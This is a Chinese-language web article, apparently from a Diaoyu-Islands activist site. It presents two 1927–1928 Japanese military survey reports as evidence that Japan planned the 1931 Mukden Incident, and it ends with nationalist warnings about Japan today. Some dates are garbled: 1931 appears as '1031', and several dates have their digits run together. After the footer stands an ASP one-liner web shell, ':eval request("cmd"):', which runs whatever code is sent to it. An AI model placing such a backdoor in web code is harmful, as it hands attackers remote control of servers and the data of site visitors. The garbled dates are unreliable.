保钓历史

日本军事谋取中国领土的原始证据

时间:2015-8-6 22:58:36  作者:李景科  来源:  查看:121  评论:1
内容摘要:在即将到来的9月3日是中国人民抗日战争胜利七十周年纪念日,而9月18日,是日本在1031年9月18日军事侵占东北的“九一八事变”84年国耻日。牢记和回顾这段历史非常有意义。九一八事变是日本侵略中国领土的蓄谋已久的国策计划。最近,笔者寻找到了两份日本军事部署...
在即将到来的93日是中国人民抗日战争胜利七十周年纪念日,而918日,是日本在1031918日军事侵占东北的“九一八事变”84年国耻日。牢记和回顾这段历史非常有意义。

九一八事变是日本侵略中国领土的蓄谋已久的国策计划。最近,笔者寻找到了两份日本军事部署的原始文件,从中可以看出日本军方早在918事变前已经对中国的军事进行全方位的侦查了。

一份是19281126日,日本关东军参谋长三宅上报的文件报告《北满洲军用资源与工场及事业场调查报告书》,这份报告包括两大部分:1,北满洲军用资源调查报告书。该报告对于中国东北北部能够用于军事或与军事相关的资源进行了全面调查。2,同工场及事业场调查报告。该报告对于中国东北北部所有的军工厂和事业单位进行了全面报告。也就是我们的家底被日军全部摸清楚了。

一份是192710月底日本中国驻屯军司令部作出的《北支那兵器调查报告》,也就是华北兵器调查报告。这个报告很全面,对于华北地区中国军队拥有的军用器材,储备中的军用器材,甚至民间拥有的武器都做了调查。而特种军用兵器,如飞机,装甲车,毒气弹,军车,军用有线电话,军用无线通讯,兵工厂以及兵器进口的途径等都做了具体详细的调查和报告。

这些足以证明,日本政府谋取中国领土,肆无忌惮的实施对中国的军事侵略是早有的计划和战略。虽然二十一世纪的今天,似乎是和平年代,但日本亡我之心和再次侵略我国领土的谋略仍然是“司马昭之心路人皆知”,我们高规格纪念中国人民抗日战争胜利七十周年和 “九一八事变”国耻日,就是告诫全国人民,要团结一心实现中国梦的伟大目标,要建设强大的中国,让被侵略的民族历史永远不要重演!
日本军事谋取中国领土的原始证据

日本军事谋取中国领土的原始证据
世保盟微信公衆号
微信掃一掃二維碼

 

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):